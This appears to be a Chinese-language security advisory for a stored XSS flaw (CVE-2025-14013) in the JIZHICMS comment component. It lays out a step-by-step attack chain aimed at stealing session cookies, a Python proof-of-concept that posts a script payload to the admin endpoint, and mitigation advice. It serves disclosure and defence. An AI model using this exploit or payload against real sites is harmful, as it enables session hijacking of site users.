CVE-2025-14013 JIZHICMS 2.5.5 Comment组件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14013

漏洞类型

存储型XSS（跨站脚本攻击）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

JIZHICMS

漏洞概述

CVE-2025-14013是JIZHICMS内容管理系统中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于评论处理组件中，具体位于/index.php/admins/Comment/addcomment.html接口。攻击者可以通过在评论内容（body参数）中注入恶意JavaScript代码，当其他用户访问包含该评论的页面时，恶意脚本将在受害者浏览器中执行。漏洞影响JIZHICMS 2.5.5及之前版本。由于该漏洞需要高权限用户才能利用，且需要用户交互，CVSS评分仅为2.4，属于低危级别。但存储型XSS仍可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全风险。厂商在收到漏洞报告后未做出任何回应。

技术细节

该漏洞是存储型XSS，存在于JIZHICMS的评论功能模块中。攻击者通过向/index.php/admins/Comment/addcomment.html接口的body参数提交恶意构造的JavaScript代码，如：<script>alert(document.cookie)</script>。由于系统未对用户输入进行充分的HTML实体转义或输入验证，恶意代码被直接存储到数据库中。当管理员或其他用户访问显示评论的页面时，服务端从数据库取出未经过滤的评论内容并嵌入到HTML页面返回给用户，浏览器将其作为合法脚本执行。攻击者可利用此漏洞窃取用户会话Cookie、进行钓鱼攻击或修改页面内容。由于需要高权限账号和用户交互才能触发，实际利用难度中等。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的JIZHICMS版本，确认版本<=2.5.5

STEP 2

步骤2：获取管理员权限

通过其他漏洞或凭据获取JIZHICMS后台管理员账号登录权限

STEP 3

步骤3：构造恶意请求

构造包含XSS payload的POST请求，目标是/index.php/admins/Comment/addcomment.html

STEP 4

步骤4：注入恶意代码

通过body参数提交恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 5

步骤5：存储到数据库

服务器未过滤直接将恶意代码存入数据库，形成存储型XSS

STEP 6

步骤6：触发执行

当其他用户访问显示评论的页面时，恶意脚本在受害者浏览器中执行

STEP 7

步骤7：窃取敏感信息

通过document.cookie窃取用户会话Cookie，进行会话劫持或其他攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14013 PoC - Stored XSS in JIZHICMS Comment Component
# Target: JIZHICMS <= 2.5.5
# Endpoint: /index.php/admins/Comment/addcomment.html

target_url = "http://target.com/index.php/admins/Comment/addcomment.html"

# Malicious payload - Stored XSS
payload = {
    "body": "<script>alert(document.cookie)</script>"
}

# Headers with admin authentication
headers = {
    "Cookie": "admin_session=your_admin_session_here",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Send the exploit request
response = requests.post(target_url, data=payload, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# When any user views the comment, the XSS will be triggered
print("\nPoC sent successfully. The XSS payload is stored in the database.")
print("Any user viewing the comment will have the script executed.")

影响范围

JIZHICMS <= 2.5.5

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时措施：1）对评论功能的输入进行严格的输入验证和过滤，禁用HTML标签输入或启用白名单机制；2）在输出时对所有用户输入内容进行HTML实体编码；3）配置严格的Content-Security-Policy头禁止内联脚本执行；4）限制低权限用户使用评论功能；5）部署Web应用防火墙规则检测和拦截XSS攻击特征；6）加强管理员账号安全，使用强密码和多因素认证。